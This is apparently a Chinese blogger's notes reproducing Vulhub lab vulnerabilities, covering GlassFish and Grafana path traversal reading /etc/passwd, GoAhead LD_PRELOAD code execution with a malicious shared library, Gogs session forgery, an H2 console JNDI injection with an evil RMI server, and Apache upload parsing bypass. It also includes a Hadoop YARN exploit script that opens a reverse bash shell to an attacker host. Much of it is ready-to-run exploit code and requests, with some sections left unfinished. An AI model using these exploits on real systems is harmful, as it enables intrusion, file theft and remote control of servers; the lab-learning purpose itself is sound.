访问https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd，发现已成功读取/etc/passwd内容：

GoAhead 远程命令执行漏洞（CVE-2017-17562）

GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server，多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序，这个漏洞就出现在运行CGI程序的时候。

GoAhead在接收到请求后，将会从URL参数中取出键和值注册进CGI程序的环境变量，且只过滤了REMOTE_HOST和HTTP_AUTHORIZATION。我们能够控制环境变量，就有很多攻击方式。比如在Linux中，LD_开头的环境变量和动态链接库有关，如LD_PRELOAD中指定的动态链接库，将会被自动加载；LD_LIBRARY_PATH指定的路径，程序会去其中寻找动态链接库。

我们可以指定LD_PRELOAD=/proc/self/fd/0，因为/proc/self/fd/0是标准输入，而在CGI程序中，POST数据流即为标准输入流。我们编译一个动态链接库，将其放在POST Body中，发送给http://target/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0，CGI就会加载我们发送的动态链接库，造成远程命令执行漏洞。

参考链接：

• https://www.elttam.com.au/blog/goahead/

漏洞复现

我们首先需要编译一个动态链接库，而且需要和目标架构相同。所以在实战中，如果对方是一个智能设备，你可能需要交叉编译。因为Vulhub运行在Linux x86_64的机器中，所以我们直接用Linux PC编译即可。动态链接库源码：

#include <unistd.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello: World!\n", 14);
}

这样，before_main函数将在程序执行前被调用。编译以上代码：

gcc -shared -fPIC ./payload.c -o payload.so

将payload.so作为post body发送：

curl -X POST --data-binary @payload.so "http://your-ip:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i 

可见，Hello: world!已被成功输出，说明我们的动态链接库中的代码已被执行：

GoAhead Server 环境变量注入（CVE-2021-42342）

GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server，多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序。

这个漏洞是CVE-2017-17562漏洞补丁的绕过，攻击者可以利用该补丁没有考虑到的multipart表单控制目标服务器的环境变量，进而劫持LD_PRELOAD来执行任意代码。

参考链接：

• https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
• https://ahmed-belkahla.me/post/2-methods-rce-0-day-in-goahead-webserver-pbctf-2021/
• https://mp.weixin.qq.com/s/AS9DHeHtgqrgjTb2gzLJZg

漏洞复现

我们首先需要编译一个动态链接库，而且需要和目标架构相同。所以在实战中，如果对方是一个智能设备，你可能需要交叉编译。因为Vulhub运行在Linux x86_64的机器中，所以我们直接用Linux PC编译即可。动态链接库源码：

#include <unistd.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello: World\r\n\r\n", 16);
    write(1, "Hacked\n", 7);
}

这样，before_main函数将在程序执行前被调用。编译以上代码：

gcc -s -shared -fPIC ./payload.c -o payload.so

然后，我们使用这个脚本来发送恶意数据包，复现漏洞：

python poc.py http://192.168.0.196:8080/cgi-bin/index payload.so

可见，我们在动态链接库中编写的劫持代码已经被成功执行：

Gogs 任意用户登录漏洞（CVE-2018-18925）(未完成)

gogs是一款极易搭建的自助Git服务平台，具有易安装、跨平台、轻量级等特点，使用者众多。

其0.11.66及以前版本中，（go-macaron/session库）没有对sessionid进行校验，攻击者利用恶意sessionid即可读取任意文件，通过控制文件内容来控制session内容，进而登录任意账户。

参考链接：

• https://github.com/gogs/gogs/issues/5469
• https://xz.aliyun.com/t/3168
• https://www.anquanke.com/post/id/163575

漏洞复现

使用Gob序列化生成session文件：

package main

import (
    "bytes"
    "encoding/gob"
    "encoding/hex"
    "fmt"
    "io/ioutil"
    "os"
)

func EncodeGob(obj map[interface{}]interface{}) ([]byte, error) {
    for _, v := range obj {
        gob.Register(v)
    }
    buf := bytes.NewBuffer(nil)
    err := gob.NewEncoder(buf).Encode(obj)
    return buf.Bytes(), err
}

func main() {
    var uid int64 = 1
    obj := map[interface{}]interface{}{"_old_uid": "1", "uid": uid, "uname": "root"}
    data, err := EncodeGob(obj)
    if err != nil {
        fmt.Println(err)
    }
    err = ioutil.WriteFile("data", data, os.O_CREATE|os.O_WRONLY)
    if err != nil {
        fmt.Println(err)
    }
    edata := hex.EncodeToString(data)
    fmt.Println(edata)
}

然后注册一个普通用户账户，创建项目，并在“版本发布”页面上传刚生成的session文件：

最后一步没能成功….

Grafana 8.x 插件模块目录穿越漏洞（CVE-2021-43798）

• Grafana是一个开源的度量分析与可视化套件。在2021年12月，推特用户@j0v 发表了他发现的一个0day，攻击者利用这个漏洞可以读取服务器上的任意文件。

  参考链接：

  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
  • https://twitter.com/hacker_/status/1467880514489044993
  • https://nosec.org/home/detail/4914.html
  • https://mp.weixin.qq.com/s/dqJ3F_fStlj78S0qhQ3Ggw

漏洞复现

这个漏洞出现在插件模块中，这个模块支持用户访问插件目录下的文件，但因为没有对文件名进行限制，攻击者可以利用../的方式穿越目录，读取到服务器上的任意文件。

利用这个漏洞前，我们需要先获取到一个已安装的插件id，比如常见的有：

alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text

再发送如下数据包，读取任意文件（你也可以将其中的alertlist换成其他合法的插件id）：

GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.1.112:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

H2 Database Console 未授权访问

H2 database是一款Java内存数据库，多用于单元测试。H2 database自带一个Web管理页面，在Spirng开发中，如果我们设置如下选项，即可允许外部用户访问Web管理页面，且没有鉴权：

spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true

利用这个管理页面，我们可以进行JNDI注入攻击，进而在目标环境下执行任意命令。

参考链接：

• https://mp.weixin.qq.com/s?__biz=MzI2NTM1MjQ3OA==&mid=2247483658&idx=1&sn=584710da0fbe56c1246755147bcec48e

漏洞复现

目标环境是Java 8u252，版本较高，因为上下文是Tomcat环境，我们可以参考《Exploiting JNDI Injections in Java》，使用org.apache.naming.factory.BeanFactory加EL表达式注入的方式来执行任意命令。

import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;
 
public class EvilRMIServerNew {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);
 
        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\")"));
 
        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("Object", referenceWrapper);
    }
}

我们可以借助这个小工具JNDI简化我们的复现过程。

首先设置JNDI工具中执行的命令为touch /tmp/success：

然后启动JNDI-1.0-all.jar，在h2 console页面填入JNDI类名和URL地址：

JNDI似乎是在github下架了 这里搞了个替代品
输入java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success 来生成我们接下来要用的payload

访问http://your-ip:8080/h2-console/即可查看h2管理器页面

其中，javax.naming.InitialContext是JNDI的工厂类，URL是运行JNDI工具监听的RMI地址。

点击connect 虽然会报错 但是已创建文件说明成功运行

Hadoop YARN ResourceManager 未授权访问结尾/引用

原理

参考 http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

漏洞复现

这个连官方给的线索也不是很多..
我参考了这个玩意儿
机子开着监听9999端口 用下面的exp（需要修改一下细节）就能获取root账号的shell了

#!/usr/bin/env python

import requests

target = 'http://192.168.226.140:8088/'
lhost = '192.168.226.134' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

Apache HTTPD 多后缀解析漏洞

Apache HTTPD 支持一个文件拥有多个后缀，并为不同后缀执行不同的指令。比如，如下配置文件：

AddType text/html .html
AddLanguage zh-CN .cn

其给.html后缀增加了media-type，值为text/html；给.cn后缀增加了语言，值为zh-CN。此时，如果用户请求文件index.cn.html，他将返回一个中文的html页面。

以上就是Apache多后缀的特性。如果运维人员给.php后缀增加了处理器：

AddHandler application/x-httpd-php .php

那么，在有多个后缀的情况下，只要一个文件含有.php后缀的文件即将被识别成PHP文件，没必要是最后一个后缀。利用这个特性，将会造成一个可以绕过上传白名单的解析漏洞。

漏洞复现

环境运行后，访问http://your-ip/uploadfiles/apache.php.jpeg即可发现，phpinfo被执行了，该文件被解析为php脚本。

http://your-ip/index.php中是一个白名单检查文件后缀的上传组件，上传完成后并未重命名。我们可以通过上传文件名为xxx.php.jpg或xxx.php.jpeg的文件，利用Apache解析漏洞进行getshell。

Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞（CVE-2021-40438）(坑)

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.48及以前的版本中，mod_proxy模块存在一处逻辑错误导致攻击者可以控制反向代理服务器的地址，进而导致SSRF漏洞。

参考链接：

• https://httpd.apache.org/security/vulnerabilities_24.html
• https://firzen.de/building-a-poc-for-cve-2021-40438
• https://www.leavesongs.com/PENETRATION/apache-mod-proxy-ssrf-cve-2021-40438.html

漏洞复现

HTTP余下的漏洞应该都试不了了 镜像pull老失败….

结尾/引用

We are just another visitor in a transient world.

原文大部分内容来自vulhub中自带的readme文件 在此非常感谢铺下前路的技术大牛